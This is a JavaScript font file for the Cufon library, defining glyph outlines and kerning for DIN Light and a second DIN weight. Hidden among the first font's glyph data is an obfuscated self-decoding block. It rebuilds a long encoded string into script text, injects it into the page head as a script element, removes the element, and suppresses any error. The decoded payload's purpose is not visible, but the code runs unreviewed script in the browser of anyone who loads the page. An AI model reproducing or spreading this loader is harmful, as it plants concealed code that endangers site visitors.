414,-221r0,-443r-232,443r232,0","w":901},{"d":"164,0r-54,0r0,-712r54,0r0,712","w":274},{"d":"698,-482r-154,482r-52,0r-136,-402r-136,402r-52,0r-154,-482r56,0r123,422r138,-422r50,0r138,422r123,-422r56,0","w":712,"k":{"\u0153":5,"\u00f8":5,"\u00f6":5,"\u00f5":5,"\u00f4":5,"\u00f3":5,"\u00f2":5,"\u00eb":5,"\u00ea":5,"\u00e9":5,"\u00e8":5,"\u00e7":5,"\u00e6":5,"o":5,"e":5,"c":5,".":60}},{"d":"395,-476r-22,38r-120,-73r3,141r-45,0r3,-141r-120,73r-22,-38r123,-68r-123,-68r22,-38r120,73r-3,-141r45,0r-3,141r120,-73r22,38r-123,68","w":467},{"d":"66,-523v0,-117,84,-188,199,-194r0,-89r45,0r0,89v67,3,128,29,182,76r-35,35v-44,-39,-93,-61,-147,-65r0,290v131,16,218,65,218,190v0,122,-94,192,-218,196r0,109r-45,0r0,-108v-102,-6,-155,-37,-214,-94r38,-38v52,51,90,77,176,83r0,-295v-110,-9,-199,-69,-199,-185xm265,-671v-87,5,-146,58,-146,146v0,91,65,125,146,137r0,-283xm310,-43v93,-5,163,-53,164,-146v1,-97,-70,-136,-164,-141r0,287","w":587},{"d":"600,-514v9,40,8,286,0,323v-25,114,-123,191,-246,191r-233,0r0,-338r-81,0r0,-42r81,0r0,-332r240,0v124,-6,216,86,239,198xm548,-200v7,-41,6,-265,-1,-306v-16,-93,-99,-159,-200,-159r-172,0r0,285r178,0r0,42r-178,0r0,291r172,0v108,3,184,-60,201,-153","w":689},{"d":"344,-240r-262,0r0,-47r262,0r0,47","w":426},{"d":"416,-482r-176,482r-50,0r-176,-482r56,0r145,422r145,-422r56,0","w":430,"k":{"\u0153":10,"\u00f8":10,"\u00f6":10,"\u00f5":10,"\u00f4":10,"\u00f3":10,"\u00f2":10,"\u00eb":10,"\u00ea":10,"\u00e9":10,"\u00e8":10,"\u00e7":10,"\u00e6":10,"s":10,"o":10,"e":10,"c":10,"a":10,".":70}},{"d":"290,-488v109,-1,178,71,178,180r0,308r-51,0r0,-299v1,-90,-45,-144,-133,-144v-86,0,-137,56,-136,144r0,299r-51,0r0,-712r51,0r0,287v36,-42,83,-63,142,-63","w":559},{"d":"461,-107r-47,0r0,-133r-361,0r0,-47r408,0r0,180"},{"d":"262,-488v135,0,201,109,193,258r-335,0v-1,115,49,190,157,190v66,0,95,-22,133,-58r38,30v-49,47,-87,74,-174,74v-142,0,-205,-96,-205,-247v0,-142,62,-247,193,-247xm404,-271v9,-130,-109,-214,-217,-150v-47,28,-64,77,-67,150r284,0xm414,-590r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":523,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"154,-649r-63,0r0,-63r63,0r0,63xm-12,185v71,5,109,-10,109,-81r0,-586r51,0r0,587v1,93,-57,136,-160,125r0,-45","w":245},{"d":"69,-241v0,-149,42,-247,180,-247v61,0,109,23,143,68r0,-62r51,0r0,509v1,122,-75,211,-197,209v-82,-1,-109,-21,-159,-64r34,-34v40,34,59,52,125,53v130,2,156,-114,146,-253v-34,45,-82,68,-143,68v-138,0,-180,-98,-180,-247xm256,-39v112,0,136,-90,136,-202v0,-113,-24,-202,-136,-202v-112,0,-136,90,-136,202v0,113,24,202,136,202","w":540},{"d":"148,0r-51,0r0,-482r51,0r0,482xm261,-590r-58,0r-106,-147r67,0","w":245},{"d":"471,-117r-95,0r0,117r-51,0r0,-117r-282,0r0,-45r262,-550r54,0r-262,550r228,0r0,-226r51,0r0,226r95,0r0,45"},{"d":"257,-718v108,0,187,82,187,190r0,344v2,108,-79,190,-187,190v-108,0,-187,-82,-187,-190r0,-344v-2,-108,79,-190,187,-190xm257,-39v87,0,137,-64,136,-150r0,-334v1,-86,-49,-150,-136,-150v-87,0,-137,64,-136,150r0,334v-1,86,49,150,136,150"},{"d":"344,-42v114,0,190,-81,190,-196r0,-474r54,0r0,481v2,137,-105,237,-244,237v-139,0,-244,-100,-244,-237r0,-481r54,0r0,474v-2,115,76,196,190,196xm477,-790r-58,0r0,-77r58,0r0,77xm269,-790r-58,0r0,-77r58,0r0,77","w":687},{"d":"262,-488v135,0,201,109,193,258r-335,0v-1,115,49,190,157,190v66,0,95,-22,133,-58r38,30v-49,47,-87,74,-174,74v-142,0,-205,-96,-205,-247v0,-142,62,-247,193,-247xm404,-271v9,-130,-109,-214,-217,-150v-47,28,-64,77,-67,150r284,0","w":523,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"176,-716v69,0,119,47,118,116v0,47,-19,78,-57,95v43,16,65,50,65,103v0,113,-136,156,-214,93v-24,-19,-37,-48,-38,-85r45,0v1,47,35,74,82,74v47,0,81,-33,81,-82v0,-57,-31,-83,-92,-81r0,-39v56,2,84,-23,84,-77v0,-47,-30,-77,-74,-77v-45,0,-73,28,-76,70r-44,0v4,-65,52,-110,120,-110","w":352},{"d":"487,0r-63,0r-166,-265r-110,127r0,138r-51,0r0,-712r51,0r0,502r239,-272r65,0r-159,180","w":527,"k":{"\u0153":25,"\u00f6":25,"\u00f5":25,"\u00f4":25,"\u00f3":25,"\u00f2":25,"\u00eb":25,"\u00ea":25,"\u00e9":25,"\u00e8":25,"\u00e7":25,"\u00e6":25,"q":25,"o":25,"g":25,"e":25,"d":25,"c":25}},{"d":"610,-488v108,-1,177,70,177,180r0,308r-50,0r0,-299v1,-90,-45,-144,-133,-144v-82,-1,-136,53,-136,135r0,308r-51,0r0,-299v1,-90,-45,-144,-133,-144v-86,0,-137,56,-136,144r0,299r-51,0r0,-482r51,0r0,57v71,-92,253,-83,298,25v37,-59,92,-88,164,-88","w":878},{"d":"461,-316r-408,0r0,-47r408,0r0,47xm461,-163r-408,0r0,-47r408,0r0,47"},{"d":"416,-482r-224,613v-21,66,-63,90,-148,87r0,-45v119,15,109,-101,146,-173r-176,-482r56,0r145,422r145,-422r56,0","w":430,"k":{"\u0153":10,"\u00f8":10,"\u00f6":10,"\u00f5":10,"\u00f4":10,"\u00f3":10,"\u00f2":10,"\u00eb":10,"\u00ea":10,"\u00e9":10,"\u00e8":10,"\u00e7":10,"\u00e6":10,"o":10,"e":10,"c":10,"a":10,".":70}},{"d":"74,-414v39,-53,83,-73,170,-74v125,0,187,53,187,158r0,330r-51,0r0,-48v-40,39,-72,53,-147,54v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94xm366,-737r-106,147r-58,0r97,-147r67,0","w":524},{"d":"509,-664r-213,0r0,664r-54,0r0,-664r-212,0r0,-48r479,0r0,48","w":539,"k":{"\u0153":80,"\u0152":20,"\u00f8":80,"\u00e7":80,"\u00e6":80,"\u00d8":20,"\u00d6":20,"\u00d5":20,"\u00d4":20,"\u00d3":20,"\u00d2":20,"\u00c7":20,"\u00c6":60,"\u00c5":60,"\u00c4":60,"\u00c3":60,"\u00c2":60,"\u00c1":60,"\u00c0":60,"z":60,"y":60,"x":60,"w":60,"v":60,"u":60,"s":80,"r":60,"q":80,"p":60,"o":80,"n":60,"m":60,"g":80,"e":80,"d":80,"c":80,"a":80,"Q":20,"O":20,"J":80,"G":20,"C":20,"A":60,".":80}},{"d":"290,-488v109,-1,178,70,178,180r0,308r-51,0r0,-299v1,-90,-45,-144,-133,-144v-86,0,-137,56,-136,144r0,299r-51,0r0,-482r51,0r0,57v36,-42,83,-63,142,-63","w":559},{"d":"269,0v-101,11,-161,-35,-160,-126r0,-318r-66,0r0,-38r66,0r0,-154r51,0r0,154r109,0r0,38r-109,0r0,319v-1,68,41,86,109,80r0,45","w":325,"k":{"\u0153":10,"\u00e7":10,"\u00e6":10,"o":10,"e":10,"c":10,"a":10}},{"d":"291,-488v138,0,180,98,180,247v0,149,-42,247,-180,247v-61,0,-109,-23,-143,-68r0,292r-51,0r0,-942r51,0r0,292v34,-45,82,-68,143,-68xm284,-39v112,0,136,-90,136,-202v0,-113,-24,-202,-136,-202v-112,0,-136,90,-136,202v0,113,24,202,136,202","w":540},{"d":"263,-488v132,0,194,96,194,247v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202","w":526,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0xm348,-780r-58,0r-106,-147r67,0","w":602,"k":{"\u0152":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"169,-285r-44,0r0,-378r-80,71r0,-51r80,-69r44,0r0,427","w":249},{"d":"291,-488v138,0,180,98,180,247v0,149,-42,247,-180,247v-61,0,-109,-23,-143,-68r0,62r-51,0r0,-712r51,0r0,292v34,-45,82,-68,143,-68xm284,-39v112,0,136,-90,136,-202v0,-113,-24,-202,-136,-202v-112,0,-136,90,-136,202v0,113,24,202,136,202","w":540}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-821-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("$3c:O6+[zP2d$g&>f6r4E3E2#n+:c62d#nV4zP8YcX-]Hb[t#mq%{3HW0:N:{}h6crN:{}h&+XN:{`,%HXN:{}h&urr!f@,%c3r!f@E%{}h!f@,%c`8!f@,4c3+!f@,%c@cG#mq%{3V6ir_!f@,%H`Xyq:h!f@,%c}c!f,hg}Gr3mEV$i{+u*J8L@qXP#HczO!f0y5(t`^&6Ye?SZ]BdQ%N4b[:nWD_U>-2|j@,%c@hu0&N:{}h`{Wh!f@,%c}(!f@,%H`f!f@,%Hb(!f@,%Hbr!f@,%Hn+!f@,%Hb8!f@,%c3cL*&N:{`,NcrN:{}h(cXN:{}htH:N:{`,%uXN:{`,4c&%Q#mq%{3E[#mq%{3J[#mq%{3Jb#mq%{@qb#mq%{38^#mq%{3qbPrN:{}h^H&N:{}h^+XN:{}h&cXN:{`,N{:N:{}h`u#_!f@,N+@VDPXN:{}h`cPr!f@E%{Pr!f@E%{P+!f@,%H6V!f@E%{@,-$:N:{}h6HL&!f@E%{}{d#mq%{3+(#mq%{3+6#mq%{3r(#mq%{3Hb#mq4{},n#mq%{3EnX&N:{`,4+&N:{}ht{XN:{`,NuGN!f@,%HP8!f@,4HbHU#mq%{38&#mq%{3H:ErN:{}h&uXN:{`,NcXN:{`,%+XN:{}h6H&N:{}h^uXN:{`,%{t(!f@,%c`&g#mq%{3c`#mq%{3+t#mq%{3X^#mq%{3EDP:N:{}h6u}r!f@,%c`r!f@,%H@f4#mq4{}GN#mq4{},NH:N:{`,buXN:{}h&{&f!f@E%{`V!f@,N+b(!f@E%{}f!f@,%H@r!f@,%c`c!f@,%H`,`u[X!f@,%c@f$HGB!f@,%c}V+#XN:{}h&c`f}#mq%{3H4@:N:{}h^+:e68n&X#mq%{3Gb#mq%{3Gn#mq%{3GD#rN6#mq4{},[VWX!f@E%{}(!f@E%{@8!f@,%H@8EVXN:{`,bHXN:{`G4{&N:{}h&+m:!f@E%{@&!f@,%HbX!f@,%H@h!f@,%H@Eb#gV]*:N:{}h`crN:{}htc}V,+^G:u}&!f@,%cPV3yrN:{}h(H&N:{}htHXN:{}h6c&N:{`,:c&N:{}h`+:N:{}h6{mr!f@,%c}rb#mq%{3G:#mq%{3{4#mq%{3G_crN:{}htcLr!f@,%HPc!f@,%H`V!f@,%HbcVf4e^#mq%{3J%i#ce#mq%{3r`#mq%{3X(z6f!f@,%cP{[{rN:{}h^HnX!f@,%H`+ZO@:_#mq%{3qNX3_[#mq%{3c&O:N:{}h`{rN:{}htuPEtiY+%O3&[$gEt$LN?*@,]!}:tiY,]O}:%i6N&O6f[zgNY*PEdct_YOm&%zm{20W[>zPHeHt_Qzb[Q#t5juYfWf:%d$@-e*b?bOPXt!6rdc3&dc:%dHn2Bym+[HPf?O6f!iY+BcPV4HP_^zP_Y#g_`On[?Vg2?iY8&!WJeO32`H#8?OnDdz32bf3_(OPq?$PcQ!t5>z@N]u4]ZzL&YPn+OzX:f*#hOzX:2$L5?")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":514,"face":{"font-family":"DIN Light","font-weight":300,"font-stretch":"normal","units-per-em":"1000","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"800","descent":"-200","x-height":"6","bbox":"-12 -975 970 236.033","underline-thickness":"38","underline-position":"-122","unicode-range":"U+0020-U+2122"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 *  Dutch Design: Albert-Jan Pool, 1995. Published by FontShop International
 * FontFont release 15
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"464,-507r-224,608v-23,75,-81,108,-182,100r0,-92v59,2,83,-8,99,-54r28,-79r-177,-483r108,0r121,357r118,-357r109,0xm370,-761r-111,162r-77,0r75,-162r113,0","w":468},{"d":"316,-513v110,0,176,74,176,189r0,324r-102,0r0,-309v1,-71,-36,-113,-102,-113v-65,0,-105,43,-105,113r0,309r-102,0r0,-507r100,0r0,51v35,-38,80,-57,135,-57xm219,-726v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":568},{"d":"363,-575v131,-3,228,89,228,216v0,127,-97,215,-228,215r-162,0r0,144r-108,0r0,-712r108,0r0,137r162,0xm356,-241v74,1,126,-44,126,-118v0,-74,-52,-120,-126,-119r-155,0r0,237r155,0","w":637},{"d":"438,-432v43,23,63,50,63,115r0,165v2,119,-81,163,-208,152r0,-87v63,4,105,-11,105,-74r0,-156v1,-61,-42,-77,-105,-72r0,-81v63,6,106,-17,105,-75v-1,-57,-40,-84,-106,-84v-72,0,-108,38,-108,113r0,516r-103,0r0,-522v-1,-128,86,-198,214,-197v118,0,206,55,205,171v0,51,-21,89,-62,116","w":565},{"d":"548,-615r-347,0r0,217r296,0r0,97r-296,0r0,301r-108,0r0,-712r455,0r0,97","w":585,"k":{"\u0153":35,"\u0152":20,"\u00f8":35,"\u00e6":35,"\u00d8":20,"\u00d6":20,"\u00d5":20,"\u00d4":20,"\u00d3":20,"\u00d2":20,"\u00c7":20,"z":30,"x":30,"u":30,"r":30,"p":30,"o":35,"n":30,"m":30,"e":35,"c":35,"a":35,"S":10,"Q":20,"O":20,"J":130,"G":20,"C":20,"A":60,".":95}},{"d":"381,0r-112,92r0,-197r112,0r0,105xm190,0r-112,92r0,-197r112,0r0,105","w":460,"k":{"Y":100,"W":50,"V":80,"T":100}},{"d":"539,-712r-213,419r0,293r-108,0r0,-293r-213,-419r118,0r149,313r149,-313r118,0xm408,-943r-111,162r-77,0r75,-162r113,0","w":544},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm411,-604r-92,0r0,-108r92,0r0,108xm195,-604r-92,0r0,-108r92,0r0,108","w":530},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm446,-943r-111,162r-77,0r75,-162r113,0","w":625,"k":{"\u0152":5,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"556,-272r-231,230r0,-123r107,-107r-107,-106r0,-123xm303,-272r-231,230r0,-123r108,-107r-108,-106r0,-123","w":592},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154xm474,-943r-111,162r-77,0r75,-162r113,0","w":675},{"d":"291,-398r-112,0r0,-109r112,0r0,109xm240,119v58,0,98,-44,98,-100r102,0v2,111,-89,192,-200,192v-110,0,-201,-80,-199,-192v1,-87,83,-169,125,-231v17,-25,19,-47,18,-84r102,0v12,116,-69,169,-112,240v-62,67,-25,175,66,175","w":511},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm422,-604r-92,0r0,-108r92,0r0,108xm206,-604r-92,0r0,-108r92,0r0,108","w":537,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"644,-368v80,0,140,55,140,137r0,101v2,82,-60,137,-140,137v-80,0,-140,-55,-140,-137r0,-101v-2,-82,60,-137,140,-137xm629,-712r-335,712r-82,0r336,-712r81,0xm198,-719v80,0,140,55,140,137r0,101v2,82,-60,136,-140,136v-80,0,-140,-54,-140,-136r0,-101v-2,-82,60,-137,140,-137xm644,-61v78,0,62,-93,63,-167v0,-48,-21,-72,-63,-72v-78,0,-62,93,-63,167v0,48,21,72,63,72xm198,-413v78,0,62,-92,63,-166v0,-48,-21,-72,-63,-72v-78,0,-62,93,-63,167v0,47,21,71,63,71","w":842},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm429,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":530},{"d":"476,-132r-64,63r-146,-145r-145,145r-64,-63r146,-146r-146,-146r64,-64r145,146r146,-146r64,64r-146,146"},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154","w":675,"k":{"J":21}},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm257,-826v68,0,125,58,125,125v0,68,-58,125,-125,125v-68,0,-125,-58,-125,-125v0,-68,58,-125,125,-125xm257,-638v34,0,64,-29,64,-63v0,-34,-30,-63,-64,-63v-34,0,-64,29,-64,63v0,34,30,63,64,63","w":530},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0xm427,-604r-92,0r0,-108r92,0r0,108xm211,-604r-92,0r0,-108r92,0r0,108","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"273,-629v-53,0,-85,26,-88,77v-3,64,87,85,145,102v95,28,142,91,142,186v0,73,-48,131,-97,156v59,26,88,73,88,141v0,163,-211,230,-327,135v-37,-29,-56,-72,-58,-127r100,0v4,50,39,79,94,79v55,0,91,-31,91,-84v0,-69,-86,-91,-148,-109v-94,-27,-141,-91,-141,-186v0,-73,48,-131,97,-156v-56,-27,-84,-72,-84,-134v0,-100,79,-169,186,-169v109,0,185,63,188,165r-98,0v-4,-51,-34,-76,-90,-76xm273,-154v61,0,99,-48,99,-107v0,-64,-42,-107,-99,-108v-62,-1,-99,46,-99,108v0,62,37,107,99,107","w":543},{"d":"629,0r-99,0r-329,-501r0,501r-108,0r0,-712r99,0r329,500r0,-500r108,0r0,712xm293,-908v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":721},{"d":"183,0r-102,0r0,-507r102,0r0,507xm389,-604r-92,0r0,-108r92,0r0,108xm173,-604r-92,0r0,-108r92,0r0,108","w":264},{"d":"183,0r-102,0r0,-507r102,0r0,507xm269,-599r-77,0r-111,-162r113,0","w":264},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113xm453,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":568},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0xm445,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"567,-513v151,1,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,78,-190,79v-80,0,-140,-26,-179,-79v-47,56,-88,78,-182,79v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49r-67,-63v46,-53,89,-72,182,-73v83,0,141,22,172,67v37,-45,87,-67,150,-67xm681,-295v-1,-81,-38,-130,-114,-133v-73,-3,-113,56,-114,133r228,0xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72","w":837},{"d":"175,-716v92,0,162,87,119,172v-35,69,-107,129,-156,190r167,0r0,69r-260,0r0,-69r161,-186v37,-36,27,-108,-31,-107v-35,0,-53,18,-53,55r-77,0v-1,-75,55,-124,130,-124","w":350},{"d":"735,-507r-158,507r-87,0r-119,-354r-118,354r-88,0r-157,-507r108,0r98,357r118,-357r79,0r117,357r98,-357r109,0","w":743,"k":{"\u0153":7,"\u00f8":7,"\u00f6":7,"\u00f5":7,"\u00f4":7,"\u00f3":7,"\u00f2":7,"\u00eb":7,"\u00ea":7,"\u00e9":7,"\u00e8":7,"\u00e7":7,"\u00e6":7,"o":7,"e":7,"c":7,".":46}},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm482,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":625,"k":{"\u0152":5,"y":8,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm310,-1000v68,0,125,58,125,125v0,68,-58,125,-125,125v-68,0,-125,-58,-125,-125v0,-68,58,-125,125,-125xm310,-812v34,0,64,-29,64,-63v0,-34,-30,-63,-64,-63v-34,0,-64,29,-64,63v0,34,30,63,64,63","w":625,"k":{"\u0152":5,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"201,0r-108,0r0,-712r108,0r0,712xm437,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":294},{"d":"303,-272r-231,230r0,-123r108,-107r-108,-106r0,-123","w":339},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm464,-786r-92,0r0,-108r92,0r0,108xm248,-786r-92,0r0,-108r92,0r0,108","w":625,"k":{"\u0152":10,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm255,-908v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":647,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"38,-513v0,-123,97,-199,225,-199r281,0r0,917r-102,0r0,-820r-108,0r0,820r-102,0r0,-522v-105,3,-194,-92,-194,-196","w":637},{"d":"559,-712r-236,712r-84,0r-234,-712r112,0r164,518r164,-518r114,0","w":564,"k":{"\u0153":40,"\u0152":10,"\u00f8":40,"\u00e7":40,"\u00e6":40,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":35,"\u00c5":35,"\u00c4":35,"\u00c3":35,"\u00c2":35,"\u00c1":35,"\u00c0":35,"z":20,"y":10,"x":20,"u":20,"s":40,"r":20,"q":40,"p":20,"o":40,"n":20,"m":20,"g":40,"e":40,"d":40,"c":40,"a":40,"Q":10,"O":10,"G":10,"C":10,"A":35,".":80}},{"d":"597,-81r-67,67r-74,-74v-71,51,-177,51,-248,0r-73,74r-67,-67r73,-74v-51,-71,-51,-177,0,-248r-73,-73r67,-67r73,73v69,-49,179,-49,248,0r74,-73r67,67r-74,73v51,71,51,177,0,248xm332,-143v73,0,136,-63,136,-136v0,-73,-63,-135,-136,-135v-73,0,-136,62,-136,135v0,73,63,136,136,136","w":665},{"d":"359,-230r-292,0r0,-95r292,0r0,95","w":426},{"d":"652,-431v92,0,163,88,120,173v-35,69,-108,128,-157,189r167,0r0,69r-259,0r0,-69r160,-186v37,-36,27,-108,-31,-107v-35,0,-53,18,-53,55r-76,0v-1,-75,54,-124,129,-124xm588,-712r-335,712r-81,0r335,-712r81,0xm204,-285r-77,0r0,-341r-87,76r0,-87r87,-75r77,0r0,427","w":827},{"d":"220,74r-102,0r0,-860r102,0r0,860","w":338},{"d":"420,-453v46,47,59,106,60,199v3,164,-68,260,-212,260v-38,0,-73,-8,-104,-25r-37,63r-69,0r58,-99v-46,-47,-56,-106,-59,-199v-5,-159,70,-255,211,-259v39,0,74,8,105,25r37,-63r69,0xm268,-422v-86,0,-108,59,-109,168v0,49,5,86,15,109r154,-260v-17,-11,-37,-17,-60,-17xm268,-85v86,0,110,-60,110,-169v0,-49,-5,-86,-15,-109r-154,260v17,12,37,18,59,18","w":537},{"d":"431,-718v195,0,362,167,362,362v0,195,-167,362,-362,362v-195,0,-362,-167,-362,-362v0,-195,167,-362,362,-362xm431,-61v159,0,289,-135,289,-295v0,-160,-130,-295,-289,-295v-160,0,-290,135,-290,295v0,160,131,295,290,295xm578,-432v0,55,-35,91,-77,106r87,165r-81,0r-80,-155r-50,0r0,155r-72,0r0,-391r147,0v70,-2,126,53,126,120xm443,-373v35,1,64,-25,64,-59v0,-34,-29,-59,-64,-59r-66,0r0,118r66,0","w":862},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113xm333,-599r-77,0r-111,-162r113,0","w":568},{"d":"205,-398r-112,0r0,-109r112,0r0,109xm211,205r-124,0r22,-500r80,0","w":332},{"d":"281,-85v65,0,104,-43,104,-113r0,-309r102,0r0,507r-100,0r0,-51v-48,55,-146,79,-209,32r0,224r-102,0r0,-712r102,0r0,309v-1,70,38,113,103,113","w":569},{"d":"381,-300v45,-1,54,-16,85,-44r65,64v-50,47,-73,71,-148,78v-45,4,-142,-58,-191,-57v-45,1,-54,16,-85,44r-64,-64v50,-47,72,-71,147,-78v45,-4,142,59,191,57","w":574},{"d":"201,0r-108,0r0,-712r108,0r0,712xm401,-786r-92,0r0,-108r92,0r0,108xm185,-786r-92,0r0,-108r92,0r0,108","w":294},{"d":"383,-786r-285,860r-98,0r285,-860r98,0","w":380},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm200,-726v38,0,94,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":537,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"482,-230r-431,0r0,-95r431,0r0,95"},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,